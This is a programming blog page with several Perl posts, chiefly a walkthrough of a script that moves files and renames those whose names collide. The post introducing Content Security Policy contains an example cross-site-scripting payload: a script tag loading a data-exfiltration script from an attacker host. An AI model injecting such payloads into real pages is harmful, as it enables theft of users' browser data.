I wanted to move a large number of files from one directory to another, but the target directory already contained files with many of the same names. This is a common enough problem: digital cameras use DSC# names, video downloaders often append numbers to get a unique filename, and so on. In both of those examples, the sequence restarts if you empty the program’s work directory. So, you’ll end up with DSC0001.jpg every time you empty your camera’s memory card. If you’re trying to move such files into a single directory, you’ll get conflicts every time.
Instead of manually renaming the files before transferring them, I wrote a simple script to give each file a unique name in the destination directory.
Mimicking mv
First, we get the arguments. Like mv, this script can take both SOURCE DEST (to rename a single file/dir to the given name), and SOURCE(S) DIRECTORY to move several sources into a single directory. Here’s how we do that:
use Path::Tiny;
my @source;
push @source, path(shift)
    while @ARGV > 1;             # Accept multiple SOURCEs,
my $dest = path(shift);          # but only one DEST/DIRECTORY.
my $dest_is_dir = $dest->is_dir; # Was DEST a directory?
Now that we have our inputs, and we disambiguated the final argument by checking if it is a directory or not, we can start to actually move the files. Note that all the paths are Path::Tiny objects.
First, we’ll have to handle the case where we’re moving files into a target directory (rather than to a specified name). Then, we simply call the move method to move each file appropriately.
foreach my $from (@source) {
    # Moving into a directory keeps the source's name; otherwise DEST is the new name.
    my $to = path( $dest, ($dest_is_dir ? $from->basename : ()) );
    $from->move($to);
}
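For comparison, here is a minimal sketch of the same SOURCE(S)/DEST disambiguation using only core modules (File::Basename and File::Spec) instead of Path::Tiny. The `plan_moves` name is hypothetical, and unlike the snippets in this post it also refuses multiple sources when DEST isn't a directory, the way mv does. It only computes the from/to pairs; it doesn't move anything.

```perl
use strict;
use warnings;
use File::Basename qw(basename);
use File::Spec;

# Given mv-style arguments (SOURCE DEST, or SOURCE... DIRECTORY),
# return a list of [from, to] pairs. Only the last argument is DEST.
sub plan_moves {
    my @args = @_;
    die "usage: SOURCE... DEST\n" if @args < 2;
    my $dest   = pop @args;    # only one DEST/DIRECTORY
    my $is_dir = -d $dest;     # was DEST a directory?
    die "target '$dest' is not a directory\n" if @args > 1 && !$is_dir;
    return map {
        my $src = $_;
        # Into a directory: keep the source's basename. Otherwise DEST is the new name.
        [ $src, $is_dir ? File::Spec->catfile( $dest, basename($src) ) : $dest ]
    } @args;
}
```

Keeping the planning step separate from the actual moves makes it easy to print a dry run before touching any files.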
At this point, the basic framework of what we want is there, but there are several complications. The first is in the spec: we want to pick some random name if we can’t do the rename because the target filename is already taken. The second is handling what the rename(2) system call won’t: moving files across filesystem boundaries. The last one is doing a bit of de-duplication.
Handling name collisions
I used the tempfile routine to get a unique filename. Normally, this creates a temporary file (which is removed when the object goes out of scope) — but we want to simply use this to pick a unique filename. To do that, we’ll need UNLINK => 0. These files are usually created in the temporary directory, but we want to create them in the target directory, so we use the DIR option.
I also chose to stick the random part of the filename right before the file extension, instead of at the end. This makes it easier to continue to use globbing like *.jpg in the directory once we’re done.
if ($to->exists) {
    my ($prefix, $suffix) = $to->basename =~ m{^(.*)\.(\w+)$};
    $to = Path::Tiny->tempfile(
        UNLINK   => 0,
        TEMPLATE => ($prefix // $to->basename) . '-XXXXXX',
        DIR      => $dest_is_dir ? $dest : $dest->dirname,
        ( $suffix ? (SUFFIX => ".$suffix") : () ),
    );
    warn "File already exists, renaming to $to\n";
}
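The same naming trick works with core File::Temp, if you'd rather not depend on Path::Tiny. This is a sketch under that assumption, and `unique_name` is a hypothetical helper. It reserves a name like DSC0001-XXXXXX.jpg in the target directory by creating an empty placeholder file, kept because of UNLINK => 0, which the subsequent rename simply replaces.

```perl
use strict;
use warnings;
use File::Temp ();

# Return a path in $dir that doesn't collide with an existing file, keeping
# the extension last (DSC0001.jpg -> DSC0001-XXXXXX.jpg) so *.jpg still matches.
sub unique_name {
    my ($dir, $name) = @_;
    my ($prefix, $suffix) = $name =~ m{^(.*)\.(\w+)$};
    my $tmp = File::Temp->new(
        TEMPLATE => ($prefix // $name) . '-XXXXXX',
        DIR      => $dir,
        ( defined $suffix ? (SUFFIX => ".$suffix") : () ),
        UNLINK   => 0,    # keep the empty placeholder so the name stays reserved
    );
    return $tmp->filename;
}
```

Because the placeholder exists on disk until the move overwrites it, a second call can't hand out the same name.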
Moving across filesystem boundaries
The second complication is that this uses the system’s rename call, which fails with EXDEV when the source and destination are on different filesystems. My media directories are on another filesystem, so this is a dealbreaker for me. Let’s catch that error condition and handle it by copying the file, then deleting the original.
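use Try::Tiny;
use POSIX qw(:errno_h);
use Scalar::Util qw(blessed);
...
try {
    $from->move($to);
}
catch {
    # Re-throw anything that isn't an exception object we know how to inspect.
    die $_ unless blessed($_) && $_->isa('autodie::exception');
    if ($_->errno == EXDEV) { # Invalid cross-device link
        $from->copy($to);
        $from->remove;
    }
    else {
        die $_;
    }
};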
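Here is a sketch of the same fallback without Try::Tiny or Path::Tiny, assuming plain Perl `rename` plus the core Errno and File::Copy modules; `move_file` is a hypothetical name. It checks `$!` against EXDEV immediately after the failed rename, before anything else can clobber it. (Core File::Copy's own `move` also falls back to copy-and-delete when rename fails, so it is an alternative worth considering.)

```perl
use strict;
use warnings;
use Errno qw(EXDEV);
use File::Copy ();

# Try a cheap rename first; only if it fails because source and destination
# are on different filesystems (EXDEV), copy the file and delete the original.
sub move_file {
    my ($from, $to) = @_;
    return 1 if rename $from, $to;
    die "rename '$from' -> '$to' failed: $!\n" unless $! == EXDEV;
    File::Copy::copy($from, $to) or die "copy '$from' -> '$to' failed: $!\n";
    unlink $from                 or die "unlink '$from' failed: $!\n";
    return 1;
}
```

Like the copy-then-remove in the Try::Tiny version, the fallback path isn't atomic, and File::Copy::copy doesn't preserve timestamps.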
Some de-duplication
In the case of a name collision, there is some probability that the two files are actually the same. In the case when they’re not, the behaviour we have so far is correct. But in the case where you’re moving an identical file, it might be nice to not dump another copy into the destination. We can detect duplicate files, and just nuke the source file if there is already a copy at the destination.
To detect duplicates, we can use a hashing scheme like MD5 or SHA-1, but that can be expensive: we might be moving large media files around, and hashing requires reading both files off the disk. We can avoid most of that cost by comparing file sizes first. If the sizes differ, the files can’t be identical, so there’s no need to hash anything; only same-size files get hashed. Since we’re not scouring the directory for duplicates (we only notice them when there is a name collision), this should be fast enough.
my $duplicates = sub {
    my $A = shift;
    my $B = shift;
    return if $A->stat->size != $B->stat->size; # avoid reading file off disk
    # Pull out the big guns
    require Digest::MD5;
    return
        Digest::MD5->new->addfile( $A->filehandle('<', ':raw') )->digest
        eq
        Digest::MD5->new->addfile( $B->filehandle('<', ':raw') )->digest
        ;
};
...
if ($to->exists) {
    if ($args{deduplicate}) {
        STDERR->autoflush(1);
        print STDERR "File already exists; checking for duplication..." if $VERBOSE;
        if ($duplicates->($from, $to)) {
            print STDERR " `$from' and `$to' are duplicates; removing the source file.\n" if $VERBOSE;
            $from->remove;
            next;
        }
        else {
            print STDERR " `$from' and `$to' are not duplicates.\n" if $VERBOSE;
        }
    }
    # pick a unique name and continue on as before
    ...
}
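The size-then-hash check can also be sketched with core Perl alone, assuming plain filenames rather than Path::Tiny objects; `is_duplicate` and `md5_of` are hypothetical names. `(stat $path)[7]` is the file size, so files of different sizes are rejected without reading a single byte, and only same-size files get hashed with Digest::MD5.

```perl
use strict;
use warnings;
use Digest::MD5;

# MD5 digest of a file's raw bytes.
sub md5_of {
    my ($path) = @_;
    open my $fh, '<:raw', $path or die "can't open '$path': $!\n";
    return Digest::MD5->new->addfile($fh)->digest;
}

# Two files count as duplicates if they have the same size and the same
# MD5 digest. The size comparison is cheap and avoids reading either file.
sub is_duplicate {
    my ($first, $second) = @_;
    return 0 if (stat $first)[7] != (stat $second)[7];
    return md5_of($first) eq md5_of($second) ? 1 : 0;
}
```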
TL;DR
And there you have it: a simple script to help you avoid some tedium. I hope it works for you. If not, the code is on GitHub.
App::mvr is available on CPAN if you want to give it a try. The use case is fairly narrow, but it was fun to play around with as a break from studying for finals. Path::Tiny in particular is a nice addition to my toolbox.
Posted: April 19th, 2013, by Mike Doherty
Categories: Linux, Perl, Programming
Tags: Linux, new-code, path-tiny, Perl
Comments: 8 Comments.
Moose led to Mouse led to Moo led to Mo led finally to M, which gives you the least object-orientation possible, which is none at all. I quipped that Perl desperately needed a new OO module called Noose - just enough object orientation to hang yourself.
Posted: February 7th, 2013, by Mike Doherty
Categories: Perl, Programming
Tags: acme, cpan, moose, new-code, noose, oo, twitter
Comments: No Comments.
The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents a web site’s scripts from accessing and interacting with scripts used on other sites. This helps keep your data safe because if your bank’s website gives you some data, it can only be accessed by your bank’s website, and not by scripts from other websites.
That’s a nice theory, it’d be a shame if some evidence happened to it.
In the real world, attackers have found ways to get around the same-origin policy to gain access to data they’re not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage — perhaps a username. Well, if your username is <script type="text/javascript" src="http://evil.attacker.com/exfiltrate_browser_data.js"></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.
I’ve just finished reading Gabriella Coleman’s new book “Coding Freedom: The ethics and aesthetics of hacking” (2013, Princeton University Press), the culmination of over a decade of field research, in-depth interviews, observation, and participation in the hacker scene globally. In this case, “hacker” refers to the free/open-source software (FOSS) hacker, and in particular to the Debian project.
At Pythian, we have one application that is composed of several components, the deployment of which needs to conform to our slightly peculiar server setup. Until recently, this required manually deploying each component. I did this a couple of weeks ago, and it took me something like 40 hours to figure out and complete. As I went, I started reading up on Module::Build, trying to figure out how to automate as much as possible. It turns out that this core module gives us a surprisingly powerful tool for customized deployment. First, it will help to understand a few aspects of how our code is deployed.
Posted: November 8th, 2012, by Mike Doherty
Categories: Linux, Perl, Work
Tags: deployment, module-build, Perl, Pythian
Comments: 5 Comments.
Perl does lots of things that make life easier, from postfix conditional and looping constructs to DWIM-infused language design. One of the interesting things I discovered when learning to open a file was that Perl can treat a scalar as an in-memory file:
my $string = "many\nlines\nof\ntext";
open my $in, '<', \$string;
while (<$in>) { print }
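The same trick works in the other direction: opening a reference to a scalar for writing collects everything you print into that scalar. A short sketch (the variable names are arbitrary):

```perl
use strict;
use warnings;

# Everything printed to $out is appended to $buffer.
my $buffer = '';
open my $out, '>', \$buffer or die "can't open in-memory file: $!";
print {$out} "line $_\n" for 1 .. 3;
close $out;

# Read the same scalar back, one line per element.
open my $in, '<', \$buffer or die "can't open in-memory file: $!";
my @lines = <$in>;
close $in;
```

This is handy in tests: code that expects a filehandle can write into a string you then inspect.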
Posted: September 15th, 2012, by Mike Doherty
Categories: Perl, Programming
Tags: bug, doy, git, leont, Perl, yanick
Comments: No Comments.
The technology world has many problems: sexism, homophobia and/or heterosexism, classism, ageism, trolls, and more – often reflecting the imperfections of broader society. One of the more pernicious problems is our denigration of the non-technical. Yes, science and technology are important, and computing in particular is important – but it is not everything. Science and technology are nothing without public understanding and engagement – a computer does nothing without an operator.
This is an update to an earlier post I wrote about the adventures I had in creating and using a mock LWP::UserAgent for testing purposes. The ever-vigilant mst overheard a conversation on the same topic, and jumped in. He pointed out that Test::MockObject (and everything using it) overrides UNIVERSAL::isa in a way that hides bugs. Because it can hide bugs, it is definitely not safe to use in a test suite, where you’re trying to uncover bugs.
The bottom line
Instead of following my earlier advice, use Test::LWP::UserAgent, a new module which avoids Test::MockObject and offers a better interface (in particular, the nonsense with subtypes is no longer needed) for creating and using mock LWP::UserAgent objects.
Posted: July 26th, 2012, by Mike Doherty
Categories: Perl, Programming
Tags: LWP, mock, moose, mst, testing
Comments: No Comments.
In university, we do a lot of waterfall in courses with project work. It isn’t the kind of thing a student would do (to) themselves, so professors feel obligated to give us that experience in class. Research shows that both business and recent graduates wish they’d been taught agile development methodologies in university and college, but course content always lags behind.
At Pythian, we used a mostly-Scrum methodology, with all the benefits and challenges that entails.
In Tips & tricks from my 4 months at Pythian, I showed how to give a symlink a new target atomically. I wasn’t aware of any module to encapsulate that, so I quickly put together File::Symlink::Atomic.
This module is useful because it eliminates the need to know how to do this safely – simply
use File::Symlink::Atomic
and you get a drop-in replacement for CORE::symlink. It creates a temporary symlink (using File::Temp to get a unique pathname) pointing to your new target, then moves it into place with a rename call. On POSIX systems, the rename system call guarantees atomicity.
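The technique itself is short enough to sketch in core Perl. This is not File::Symlink::Atomic's actual code, just a minimal version of the idea described above, with a hypothetical `atomic_symlink` name: get an unused name next to the link with File::Temp's `mktemp`, create the new symlink there, then `rename` it over the old one. The temporary link has to live in the same directory (and therefore on the same filesystem) for the rename to work.

```perl
use strict;
use warnings;
use File::Basename qw(dirname);
use File::Spec;
use File::Temp qw(:mktemp);

# Atomically (re)point $link at $target.
sub atomic_symlink {
    my ($target, $link) = @_;
    # An unused name in the same directory as $link, so rename() stays on one filesystem.
    my $tmp = mktemp( File::Spec->catfile( dirname($link), '.symlink-XXXXXX' ) );
    symlink $target, $tmp or die "symlink '$tmp' failed: $!\n";
    # On POSIX systems, rename(2) replaces an existing $link in a single step.
    unless ( rename $tmp, $link ) {
        my $err = $!;
        unlink $tmp;    # don't leave the temporary link behind
        die "rename '$tmp' -> '$link' failed: $err\n";
    }
    return 1;
}
```

At no point does `$link` stop existing: readers see either the old target or the new one.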
I put it on PrePAN to get some advice. I have no clue what that’ll do on any non-POSIX systems that have symlinks (if the OS doesn’t do symlinks, I can’t help you). Is a rename call universally atomic? If not, how can I detect those platforms, and provide that atomic guarantee some other way?
I didn’t get any feedback, so I chose to simply release the module. It’s now on CPAN. Enjoy!
Posted: May 26th, 2012, by Mike Doherty
Categories: Linux, OS, Perl, Programming, Work
Tags: new-code, Perl, prepan
Comments: 1 Comment.
In the past month, a number of people have asked about the theme for this blog. I was particularly flattered that someone even asked where I bought it.
It is just a customized version of Joey Robinson’s Minimalist theme. My aim was to keep the same design principles – fast-loading, minimalism, readability – but update it to have a more modern look. One major goal was to have a truly great font via @font-face on modern browsers, so I used the Junction font from The League of Movable Type. They’re an awesome group of free font designers – you should check out their other fonts too!
I also rewrote the javascript with jQuery, because mootools is ugh.
The new theme is called, unsurprisingly, “Hashbang” – and is now available on GitHub. Enjoy!
After working with Yanick Champoux on a few little Perl projects here and there, we finally met face-to-face at YAPC::NA last summer. A few months later, when I was looking for a co-op position, I immediately thought of Pythian.
Posted: May 19th, 2012, by Mike Doherty
Categories: Linux, Perl, Programming, Work
Tags: Linux, Perl, Pythian, yanick
Comments: 4 Comments.
I was asked to add SSL support to a client library, while also moving from home-grown manual HTTP code to a proper module. HTTP::Tiny was ideal because it is pure-Perl, a core module since 5.14 (so it’ll be maintained), and it’s just one .pm file, making it easy to ship.
An application server that supported SSL was provided for testing purposes, but the SSL certificate didn’t match the hostname – HTTP::Tiny correctly rejected connections. I needed to be able to control the settings sent to the underlying IO::Socket::SSL object used for the encrypted connection so I could turn off security features for testing. As I worked on that, David Golden offered invaluable feedback, which greatly improved the design of the features added to HTTP::Tiny.
As of 0.018, HTTP::Tiny is more configurable, and has a simple interface for easily making SSL connections more secure.
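A sketch of what this configuration can look like, assuming the `verify_SSL` and `SSL_options` constructor arguments that current HTTP::Tiny documents (`SSL_options` is passed through to IO::Socket::SSL). The hostname is a placeholder. Rather than switching verification off for a test server whose certificate names a different host, `SSL_verifycn_name` (an IO::Socket::SSL option) tells it which name to expect.

```perl
use strict;
use warnings;
use HTTP::Tiny;

# Verify the server's certificate and that it matches the requested hostname.
my $secure = HTTP::Tiny->new( verify_SSL => 1 );

# For a test server whose certificate was issued for a different name:
# keep verification on, but tell IO::Socket::SSL which name to check against.
my $testing = HTTP::Tiny->new(
    verify_SSL  => 1,
    SSL_options => { SSL_verifycn_name => 'appserver.example.com' },
);

# Requests look the same either way, e.g.:
# my $res = $testing->get('https://10.0.0.5/status');
# print "$res->{status}\n";
```

Narrowing the exception to one expected name keeps certificate checking in place, which is safer than `verify_SSL => 0`.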
Posted: April 18th, 2012, by Mike Doherty
Categories: Perl, Work
Tags: cpan, dagolden, Perl, security, SSL
Comments: 9 Comments.
Init scripts are annoying little things – almost entirely boilerplate. Here’s how I learned to stop struggling, and love Daemon::Control to control my daemons.
The module really is as simple as the synopsis - you describe the daemon, have it write an init script (which actually just runs your Daemon::Control script) for you, then run update-rc.d and you’re golden.
Posted: April 16th, 2012, by Mike Doherty
Categories: Linux, Perl, Programming
Tags: Linux, Perl
Comments: 3 Comments.
I’ve always favoured pastebins that let you bin a paste and nothing more – p.defau.lt and sprunge.us spring to mind. I’ve made a Perl almost-clone of sprunge.us:
http://p.hashbang.ca now runs WWW::Hashbang::Pastebin, a simple pastebin written with Dancer and DBIx::Class that does nothing but store your text and show it back to you. The only feature beyond that is if you append a +, you’ll get line numbering (no syntax highlighting). You can use an anchor to jump to any line (click the line number), and the number for that line will be highlighted.
To interact with the pastebin, just POST with paste content in p and get the URL back in the X-Pastebin-URL HTTP header (and in the body, so curl-ing will Just Work):
curl -F 'p=<-' http://p.hashbang.ca < /var/log/syslog
http://p.hashbang.ca/U
Or, use the Perl client, which provides a command-line tool to do the same thing (and also fetch paste content, given an ID).
Posted: April 15th, 2012, by Mike Doherty
Categories: Perl
Tags: cli, dancer, dbix-class, new-code
Comments: 1 Comment.